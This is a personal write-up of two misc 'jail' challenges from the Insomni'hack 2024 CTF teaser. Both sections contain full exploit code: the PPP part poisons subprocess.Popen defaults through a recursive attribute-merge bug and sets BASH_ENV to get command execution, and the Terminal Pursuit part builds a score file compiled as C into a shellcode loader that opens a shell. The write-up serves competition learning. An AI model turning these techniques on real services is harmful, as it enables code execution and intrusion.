# insomni'hack teaser 2024 i, for one, am not afraid to seek answers to life's toughest questions like "how well can a team of 2 people do in a 24 hour ctf when they start almost 12 hours late" ![a screenshot of all the challenges, we solved 8/14 not counting "welcome"](https://git.lain.faith/haskal/writeups/raw/branch/main/2024/inso/chals.png) this is like, not bad actually??? anyway, let's talk about jails - [misc: PPP](#ppp) - [misc: terminal pursuit](#terminal-pursuit) ## PPP (there was no flavor text for this one, it was just a flavor image of rhianna and i'm not gonna like go download it and then rehost it here so just imagine that's what's here) [files](https://git.lain.faith/haskal/writeups/src/branch/main/2024/inso/ppp) we can see immediately that the flag is inaccessible to the challenge user, and the only way to get it is to execute the command `/readflag Please` (immediately because i just like, ran the binary and found out that's what it does. i didn't bother reversing it at all) here's the code for the challenge server ```python from os import popen import hashlib, time, math, subprocess, json def response(res): print(res + ' | ' + popen('date').read()) exit() def generate_nonce(): current_time = time.time() rounded_time = round(current_time / 60) * 60 # Round to the nearest 1 minutes (60 seconds) return hashlib.sha256(str(int(rounded_time)).encode()).hexdigest() def is_valid_proof(data, nonce): DIFFICULTY_LEVEL = 6 guess_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest() return guess_hash[:DIFFICULTY_LEVEL] == '0' * DIFFICULTY_LEVEL class Blacklist: def __init__(self, data, nonce): self.data = data self.nonce = nonce def get_data(self): out = {} out['data'] = self.data if 'data' in self.__dict__ else () out['nonce'] = self.nonce if 'nonce' in self.__dict__ else () return out def add_to_blacklist(src, dst): for key, value in src.items(): if hasattr(dst, '__getitem__'): if dst[key] and type(value) == dict: add_to_blacklist(value, dst.get(key)) else: dst[key] = value elif hasattr(dst, key) and type(value) == dict: add_to_blacklist(value, getattr(dst, key)) else: setattr(dst, key, value) def lists_to_set(data): if type(data) == dict: res = {} for key, value in data.items(): res[key] = lists_to_set(value) elif type(data) == list: res = () for value in data: res = (*res, lists_to_set(value)) else: res = data return res def is_blacklisted(json_input): bl_data = blacklist.get_data() if json_input['data'] in bl_data['data']: return True if json_input['nonce'] in bl_data['nonce']: return True json_input = lists_to_set(json_input) add_to_blacklist(json_input, blacklist) return False if __name__ == '__main__': blacklist = Blacklist(['dd9ae2332089200c4d138f3ff5abfaac26b7d3a451edf49dc015b7a0a737c794'], ['2bfd99b0167eb0f400a1c6e54e0b81f374d6162b10148598810d5ff8ef21722d']) try: json_input = json.loads(input('Prove your work 😼\n')) except Exception: response('no') if not isinstance(json_input, dict): response('message') data = json_input.get('data') nonce = json_input.get('nonce') client_hash = json_input.get('hash') if not (data and nonce and client_hash): response('Missing data, nonce, or hash') server_nonce = generate_nonce() if server_nonce != nonce: response('nonce error') if not is_valid_proof(data, nonce): response('Proof of work is invalid') server_hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest() if server_hash != client_hash: response('Hash does not match') if is_blacklisted(json_input): response('blacklisted PoW') response('Congratulation, You\'ve proved your work 🎷🐴') ``` there's a proof-of-work segment (sigh), checking that your input doesn't belong to a set of disallowed inputs and then...seemingly nothing! ### where's the primitive??? normally what i'll loosely call "pyjail" style challenges have some sort of core execution primitive like doing an eval on user-supplied code, subject to some sandboxing, or maybe AST sanitization, or perhaps being able to replace bytecode on function objects. this code is interesting because it doesn't do any of that, yet we can assume that at some point we gain the ability to execute `/readflag Please` to read the flag instead, after verifying the proof of work, it goes through the following functions - `is_blacklisted` - transformed by `lists_to_set` - this function converts any lists nested at any level in the data structure to tuples - there's literally no need for this for normal functioning of the server, so we could assume it's an important part of the solution. (this turns out to be correct) - processed by `add_to_blacklist` - this merges the user input with the `Blacklist` object instance recursively, handling dicts and object attributes along the way when something looks weird it's worth thinking about it because that can help greatly narrow the search space for a solution. in this case, we can assume that solutions would involve tuples somehow, because we're given this primitive that serves no other useful purpose than to produce tuples so the primitive is assignment to values at any depth of objects reachable from the starting object instance, of any type supported by json the targets of this primitive are any object that can be found by recursively traversing using - dict lookups - attribute lookups and the values that can be changed or added are - `None` - strings - ints and floats - booleans - dicts of any of this - tuples of any of this an important thing we *can't* do is assign a value to a lookup for an existing other runtime value. in other words, this is a write-only primitive ### fucking around in ipython a good approach to pyjails is press the `.` key and then hit tab a bunch of times in ipython. seriously. so let's go do that for a second ```python Python 3.11.6 (main, Nov 14 2023, 09:36:21) [GCC 13.2.1 20230801] Type 'copyright', 'credits' or 'license' for more information IPython 8.18.1 -- An enhanced Interactive Python. Type '?' for help. [ins] In [1]: import ppp [ins] In [2]: obj = ppp.Blacklist(['x'], ['y']) [ins] In [3]: obj.__ ``` the object has its usual defined attributes, and then the set of python intrinsic double underscore attributes. the goal here is to get a reference to anything interesting, with a specific focus on stuff that is tuples unfortunately the object itself is not that interesting. `__class__` is a useful thing to get references to other random stuff but we get stuck at the `__subclasses__()` barrier because that's a function and we can't call functions. most of this stuff is also read-only, so that doesn't help us either let's look at the function `get_data` ```python [ins] In [3]: obj.get_data.__ ``` i was expecting there to be like `__code__` in here but there *wasn't*. so i quickly learned that this is a bound instance of the underlying function, which python has a dedicated object for, and the underlying function can be accessed with `__func__` ```python [ins] In [3]: obj.get_data.__func__.__ ``` so there's the `__code__` attribute which can be used to replace the bytecode of the function, but only if you call the `replace` function, the attributes can't be written directly. there's some other stuff in here but it's mostly function calls and not that interesting. `__module__` would be nice if it were a reference *to the actual module* and not just the name of it but oh well one thing i found here that is really interesting is `__defaults__` and `__kwdefaults__` ### `__defaults__` `__defaults__` stores the default arguments for the function, if it was defined with default arguments ```python [ins] In [1]: def my_func(a="default value"): ...: print(a) ...: [ins] In [2]: my_func.__defaults__ Out[1]: ('default value',) ``` `__kwdefaults__` similarly does defaults for non-positional keyword arguments notice how `__defaults__` takes a tuple. *and it's settable* ```python [ins] In [3]: my_func.__defaults__ = ("lol hacked",) [ins] In [4]: my_func() lol hacked ``` it's all coming together,,, unfortunately `get_data` doesn't take any arguments. so we'll have to find something else to do this on ### going deeper backtracking, there is one more useful key in the function's attributes: `__globals__` ```python [ins] In [3]: obj.get_data.__func__.__globals__ { [...snip...] 'popen': , 'hashlib': , 'time': , 'math': , 'subprocess': , 'json': , 'response': , 'generate_nonce': , 'is_valid_proof': , 'Blacklist': ppp.Blacklist, 'add_to_blacklist': , 'lists_to_set': , 'is_blacklisted': } ``` neat remember that the goal is the execute a command with an argument. taking a look at the actual `ppp` module the only remotely similar thing is the call to `popen` in the `response` function. we also see that `subprocess` is imported but not used (huh i wonder why that is,). so we have `popen` in scope here let's try to bonk it ```python # VxWorks has no user space shell provided. As a result, running # command in a shell can't be supported. if sys.platform != 'vxworks': # Supply os.popen() def popen(cmd, mode="r", buffering=-1): if not isinstance(cmd, str): raise TypeError("invalid cmd type (%s, expected string)" % type(cmd)) if mode not in ("r", "w"): raise ValueError("invalid mode %r" % mode) if buffering == 0 or buffering is None: raise ValueError("popen() does not support unbuffered streams") import subprocess if mode == "r": proc = subprocess.Popen(cmd, shell=True, text=True, stdout=subprocess.PIPE, bufsize=buffering) return _wrap_close(proc.stdout, proc) else: proc = subprocess.Popen(cmd, shell=True, text=True, stdin=subprocess.PIPE, bufsize=buffering) return _wrap_close(proc.stdin, proc) ``` ok so let's just try to change the defaults ```python [ins] In [1]: from os import popen [ins] In [2]: popen.__defaults__ = ("/readflag Please", "r", -1) [ins] In [3]: popen Out[3]: [ins] In [4]: popen("date").read() Out[4]: 'Sun Jan 21 08:05:37 PM EST 2024\n' ``` so unfortunately when the cmd argument is provided, we can't override it using the defaults. this makes sense `os.popen` uses `subprocess.Popen` internally. hey remember how `subprocess` is imported but never used so it's in the `__globals__`?? wow that sure is convenient! let's set defaults on `subprocess.Popen` ```python class Popen: # .... def __init__(self, args, bufsize=-1, executable=None, stdin=None, stdout=None, stderr=None, preexec_fn=None, close_fds=True, shell=False, cwd=None, env=None, universal_newlines=None, startupinfo=None, creationflags=0, restore_signals=True, start_new_session=False, pass_fds=(), *, user=None, group=None, extra_groups=None, encoding=None, errors=None, text=None, umask=-1, pipesize=-1, process_group=None): """Create new Popen instance.""" # ... ``` what we are provided is `args`, `shell`, `text`, `stdout`, and `bufsize`, so we can't override those. but we can assign a new default value to anything else at this point we could try the basic approach of setting `executable` to `/readflag`, but since there is no control of the argument to `/readflag` this won't work. how else can we input a full command with an argument? ### to the bash man pages! one possible way to control the behavior of the shell that is launched (we can choose `bash` or the default `sh` [`dash`] based on the `executable` parameter) is via environment variables so i opened up the man page for bash..........and then i immediately gave up and just asked @rhelmot whether there was any cheese with bash environment variables you could do, and she offered up `BASH_ENV` ```text BASH_ENV If this parameter is set when bash is executing a shell script, its value is interpreted as a filename containing commands to initialize the shell, as in ~/.bashrc. The value of BASH_ENV is subjected to parameter expansion, command substitution, and arithmetic expansion before being interpreted as a filename. PATH is not used to search for the resultant filename. ``` *unfortunately*, `BASH_ENV` needs to be a filename instead of just a list of commands. so to solve the issue of having a file @rhelmot suggested `/proc/self/environ`. unfortunately this doesn't work because the size of the file as reported by the kernel is 0, and bash actually uses that when reading it, ```bash BASH_ENV=/proc/self/environ AAAA="$(printf '\n\necho hacked\n')" strace /bin/bash -c "date" .... openat(AT_FDCWD, "/proc/self/environ", O_RDONLY) = 3 newfstatat(3, "", {st_mode=S_IFREG|0400, st_size=0, ...}, AT_EMPTY_PATH) = 0 read(3, "", 0) = 0 close(3) = 0 .... ``` u_u however there is another thing we can do which is to just use stdin, because the original stdin is still bound to the process that gets executed! so we can pass `BASH_ENV` as `/proc/self/fd/0` and then provide the additional command to run as input. this also requires us to call `shutdown` on the socket to the remote in order to close the stream ### putting it together assembly of the final exploit: ```python popen_defaults = [-1, "/bin/bash", None, None, None, None, True, False, None, {"BASH_ENV":"/proc/self/fd/0"}, None, None, 0, True, False, []] ``` this defines the defaults tuple that gets assigned to `Popen.__init__.__defaults__`, kept same as the original except for executable `/bin/bash` and environment with `BASH_ENV` ```python for _ in tqdm.trange(50000000): nonce = ppp.generate_nonce() data = secrets.token_hex(16) if ppp.is_valid_proof(data, nonce): break else: raise Exception("oops") hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest() ``` this generates the proof of work. we just steal the original code's nonce generator and validation function ```python obj = { "data": data, "nonce": nonce, "hash": hash, "get_data": { "__func__": { "__globals__": { "subprocess": { "Popen": { "__init__": { "__defaults__": popen_defaults } } } } } } } payload = json.dumps(obj) ``` this assembles the payload with the proof of work along with the attribute we're setting the attribute written out is `.get_data.__func__.__globals__["subprocess"].Popen.__init__.__defaults__` finally, we run the exploit ```python print("running") r = remote("ppp.insomnihack.ch", 12345) print(r.recvline()) r.sendline(payload) r.sendline("/readflag Please") ``` and here we call `shutdown` to close the stdin stream on the remote ```python r.shutdown('send') r.interactive() ``` normally, we should be done here, however this didn't seem to work on the remote ### that's right, get nagled turns out the issue (probably?) was that somehow pwntools is not setting `TCP_NODELAY` and thus the stage 1 and stage 2 payloads were probably getting combined into the same packet or somehow not sent at all. i had intuition for nagling being a thing that exists so i didn't debug this issue at all i just added ```python r.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) ``` this made the exploit work at the time, though when testing it further i realized it's still kind of unstable, and i'm not actually sure how it managed to work the first time during the CTF. oh well. it works locally so i'm not super concerned ## terminal pursuit it's a *makefile/c jail* > During COVID a friend of mine decided to learn coding by implementing a game he loves: Trivial > Pursuit. He started with C but, finding it too difficult, he switched to python midway through. > > Terminal Pursuit is the result of his work. I take no responsibility at all, all what I have done > was dockerize the thing, it may be broken, I'll let you figure that out... > > `nc terminal-pursuit.insomnihack.ch 1337` [files](https://git.lain.faith/haskal/writeups/src/branch/main/2024/inso/terminal) there's a bunch of jail stuff that ends up being kind of unimportant, but after taking a look we can see the structure of the server - `main.py`: contains the main interaction mode - `quizzes/Makefile`: builds the quiz binaries (in C) - `quizzes/*.c`: the quiz binaries - `quizzes/pts.txt`: the score file appended to by the quiz binaries ### main.py i've cut it down to just the most important parts ```python alphabet = "abcdefghijklmnopqrstuvwxyz/,:;[]_-." # .... def get_user_string(text): print(text) s = input("> ").lower() for c in s: if c not in alphabet: exit(0) return s[:7] ``` this defines the allowed user input. all inputs must be 7 characters or less, and come from the very restricted alphabet ```python def run_quizz(username, category): command = f"make run quizz=\"{prefix + category}\" username=\"{username}\"" os.system(command) def play(): username = get_user_string(gui.username) category = get_user_string(gui.category) run_quizz(username, category) ``` each quiz is run by prompting the user for their username, and the name of the quiz, and then calling `make` with the parameters. the makefile then builds and runs the specified quiz binary ```make CC = gcc CFLAGS = -x c -w ifeq ($(findstring .,$(quizz)),) override quizz:=$(quizz).c endif run: build @./run "$(username)" build: @$(CC) $(CFLAGS) "$(quizz)" -o run ``` the makefile also appends a `.c` to the quiz name if it doesn't already have a `.` in it. additionally it uses the `-x c` parameter to force the source language to be C. it's interesting that it does this because the provided quizzes, `books.c`, `ctf.c`, and `miscgod.c` are all obviously C files, and the flag shouldn't be needed for those. let's make a note of this here's an example of a quiz, in `books.c` (note only `books.c` and `miscgod.c` are defined, `ctf.c` doesn't contain any quiz code) ```c // ... const int LEN = 6; const char *QUESTIONS[] = { // ... }; const int SOLUTIONS[] = { 1, 1, 1, 1, 1, 1, }; /****************** * Main ******************/ int main(int argc, char* argv[]) { setvbuf(stdout, NULL, _IONBF, 0); FILE *file; file = fopen(scores_file, "a"); fprintf(file,"%s = {", argv[1]); int answer; int score = 0; for (int i = 0; i < LEN; i++) { printf("%s\n", QUESTIONS[i]); printf("Your answer: "); scanf("%d", &answer); if (answer == SOLUTIONS[i]) { score++; printf("Correct!\n\n"); } else { printf("False!\n\n"); } fprintf(file, "%d,", answer); } fprintf(file, "%d}\n", score); fclose(file); } ``` we can see that the quiz asks the user for a series of answer inputs, reads them with `scanf("%d")`, and produces a score file consisting of the provided username, a list of the answers, and the final score. for example, if we play `books` as username `user`, the resulting `pts.txt` file will look like this ``` user = {1,2,3,4,5,6,1} ``` and that's it. that's all you get ### revisiting `-x c` since there's no obvious code execution primitives in the code, we can assume that some trickery is needed to gain code execution. notice that `pts.txt` is in the `quizzes` directory. also, it's an allowed input because it's 7 chars and only uses allowed characters. what happens if we try to run the quiz `pts.txt`? ```bash $ make username=user quizz=pts.txt pts.txt:1:1: error: expected ‘,’ or ‘;’ at end of input 1 | user = {1,2,3,4,5,6,1} | ^~~~ make: *** [Makefile:12: build] Error 1 ``` huh, neat the cflag `-x c` in the makefile ensures that gcc compiles `pts.txt` as if it was C source. now clearly as it stands it's not quite C, but maybe we can make this work ### when is main not a function one thing that stands out here is the ability to assign a variable as a compound integer initializer. this can be used to define functions that are normally, y'know, functions, as arrays of integers, and it still works when compiled because gcc puts the integer bytes into the binary, and the integer bytes are valid instructions. see [main is usually a function. so then when is it not?](https://jroweboy.github.io/c/asm/2015/01/26/when-is-main-not-a-function.html) that post comes up with the following ```c const int main[] = { -443987883, 440, 113408, -1922629632, 4149, 899584, 84869120, 15544, 266023168, 1818576901, 1461743468, 1684828783, -1017312735 }; ``` this actually compiles, and interestingly enough just `main = { .... };` still compiles, but doesn't run because `main` gets put in `.data` which is not normally executable. hence the `const` in the above example. that actually causes main to get put in `.rodata` ```bash gcc -x c -w - < #include #include #include #define rv(x) register uint64_t x asm(#x) void test(){ rv(rax) = SYS_mmap; rv(rdi) = 0; rv(rsi) = 4096; rv(rdx) = PROT_READ | PROT_WRITE | PROT_EXEC; rv(r10) = MAP_SHARED | MAP_ANONYMOUS; rv(r8) = -1; rv(r9) = 0; asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx),"r"(r10), "r"(r8),"r"(r9):"memory"); void (*tmp)(void) = (void*)rax; rdi = 0; rsi = rax; rax = 0; rdx = 4096; asm volatile("syscall":"+r"(rax):"r"(rdi),"r"(rsi),"r"(rdx):"memory"); tmp(); } ``` this produces ```asm test: mov eax, 9 xor edi, edi mov esi, 4096 or r8, -1 mov edx, 7 mov r10d, 33 xor r9d, r9d syscall mov edx, 4096 mov rcx, rax mov rsi, rax xor eax, eax syscall jmp rcx ``` it's 49 bytes. damn there's a trick to save some more bytes which is to push `rax` after the `mmap` and `ret` at the end. this gets us down to 46 bytes ```asm mov eax, 9 xor edi, edi mov esi, 4096 or r8, -1 mov edx, 7 mov r10d, 33 xor r9d, r9d syscall mov edx, 4096 mov rsi, rax push rax xor eax, eax syscall ret ``` and then the second stage is just the normal pwntools shellcode, which again, i didn't realize would have worked on its own. oh well ### fixing the formatting so there's still the slight problem that the `pts.txt` file isn't quite valid C syntax as it stands. we can fix that, because we're allowed the `/` character, which means we can insert comments. additionally, we can use `;//` at the end to add the necessary semicolon (and comment out the rest) for this we can use the usernames `const//`, `int//`, `main[]`, and `;//`, so the final points file will look like this ```c const// = { ... } int// = { ... } main[] = { shellcode int values here } ;// = { ... } ``` this becomes a valid C file in the right format ## putting it together ```python stage1 = """ mov eax, 9 xor edi, edi mov esi, 4096 or r8, -1 mov edx, 7 mov r10d, 33 xor r9d, r9d syscall mov edx, 4096 mov rsi, rax push rax xor eax, eax syscall ret """ stage1_bin = asm(stage1) assert len(stage1_bin) == 46 stage1_bin = stage1_bin + b"\x00\x00" stage1_payload = list(struct.unpack(" ", b"1") r.sendlineafter(b"> ", game["username"].encode()) r.sendlineafter(b"> ", game["quiz"].encode()) if "answers" in game: for answer in game["answers"]: r.sendlineafter(b"answer: ", str(answer).encode()) else: r.send(game["rawinput"]) ``` finally, we define the utility function to play a game from a given game specification, and then run the exploit ```python def run(host="localhost"): r = remote(host, 1337) for game in games: play_game(r, game) r.interactive() ``` this should pop a shell, and from there the flag can be read out ## conclusion ctfs can often have really bad misc categories. misc is known to be plagued with annoying gamey challenges and this can make a ctf pretty frustrating to play. but i can solidly say that the insomni'hack teaser wasn't one of these ctfs both of these misc challenges were really interesting and presented novel exploitation paths that needed to work around very tight constraints. and solving them was a lot of fun ```c const int main[] = {15544, 268382464, 5}; ```